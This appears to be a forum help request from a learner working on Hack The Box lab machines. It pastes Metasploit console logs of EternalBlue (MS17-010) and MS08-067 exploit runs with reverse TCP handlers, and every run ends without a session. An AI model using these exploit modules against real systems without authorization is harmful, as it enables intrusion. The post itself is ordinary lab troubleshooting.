Hello.
I’ve attempted to run exploits on 3 machines, Lame, Legacy, and Blue. They all come back with the same message, “Exploit completed but no session created.” I’m thinking it may have something to do with VPN and not metasploit?
I tried to reinstall Metasploit from GitHub - the nightly installer, no dice. I’m using the latest version of Kali on a Virtual box VM.
The first example is Blue.
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
Started reverse TCP handler on 10.0.3.15:4444
10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
10.10.10.40:445 - CORE raw buffer dump (42 bytes)
10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
10.10.10.40:445 - Sending all but last fragment of exploit packet
[-] 10.10.10.40:445 - RubySMB::Error::CommunicationError: An error occured reading from the Socket Connection reset by peer
[*] Exploit completed, but no session was created.
The second example is Legacy.
Here I’ve tried auto targeting and a few other targets. I am unable to get a session.
[] Started reverse TCP handler on 10.0.3.15:4444
[-] 10.10.10.4:445 - Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_PIPE_NOT_AVAILABLE (Command=162 WordCount=0)
[] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms08_067_netapi) > set target 0
target => 0
msf5 exploit(windows/smb/ms08_067_netapi) > run
[] Started reverse TCP handler on 10.0.3.15:4444
[] 10.10.10.4:445 - Automatically detecting the target…
[] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 2+ - lang:English
[-] 10.10.10.4:445 - Could not determine the exact service pack
[-] 10.10.10.4:445 - Auto-targeting failed, use ‘show targets’ to manually select one
[] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms08_067_netapi) > set target 1
target => 1
msf5 exploit(windows/smb/ms08_067_netapi) > run
[] Started reverse TCP handler on 10.0.3.15:4444
[-] 10.10.10.4:445 - Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_PIPE_NOT_AVAILABLE (Command=162 WordCount=0)
[] Exploit completed, but no session was created.